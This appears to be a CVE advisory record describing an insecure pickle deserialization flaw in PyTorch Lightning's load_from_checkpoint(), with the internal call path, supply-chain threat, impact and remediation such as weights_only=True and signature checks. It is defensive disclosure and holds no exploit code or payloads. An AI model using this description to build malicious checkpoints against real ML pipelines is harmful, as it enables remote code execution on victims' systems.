CVE-2026-31221 — Insecure checkpoint deserialization in PyTorch Lightning load_from_checkpoint

MITRE service request: 1987825

Status: RESERVED (pending a qualifying public reference per CNA Rules §5.3).

Official CVE description

PyTorch-Lightning versions 2.6.0 and earlier contain an insecure deserialization vulnerability (CWE-502) in the checkpoint loading mechanism. The LightningModule.load_from_checkpoint() method, which is commonly used to load saved model states, internally calls torch.load() without setting the security-restrictive weights_only=True parameter. This default behavior allows the deserialization of arbitrary Python objects via the Pickle module. A remote attacker can exploit this by providing a maliciously crafted checkpoint file, leading to arbitrary code execution on the victim’s system when the file is loaded.

Summary

Any workflow that calls LightningModule.load_from_checkpoint() on an untrusted .ckpt inherits PyTorch’s unsafe unpickling defaults. Malicious checkpoints can embed arbitrary pickle gadgets, achieving code execution the moment Lightning restores weights.

Affected product and versions

• Product: Lightning-AI/pytorch-lightning.
• Affected range (coordination record): versions ≤ 2.6.0 (commit 2f448e14fcdc54c7c82764cf7156c5b39216e92b in original submission).

Technical details

• API: LightningModule.load_from_checkpoint() → internal _load_from_checkpoint() → torch.load in fabric/utilities/cloud_io._load() with weights_only=False default.
• Threat: Supply-chain distribution of forged checkpoints (repos, S3 buckets, email).
• Impact: RCE under the interactive user or service account loading the model.
• Scope: Affects any Lightning consumer app that does not pre-validate checkpoint bytes.

Risk

High — common API path in ML training and inference pipelines.

Remediation / workaround

• Prefer Lightning/PyTorch versions that support hardened loading; pass weights_only=True where API permits.
• Verify checkpoint signatures before load; isolate loads in disposable environments.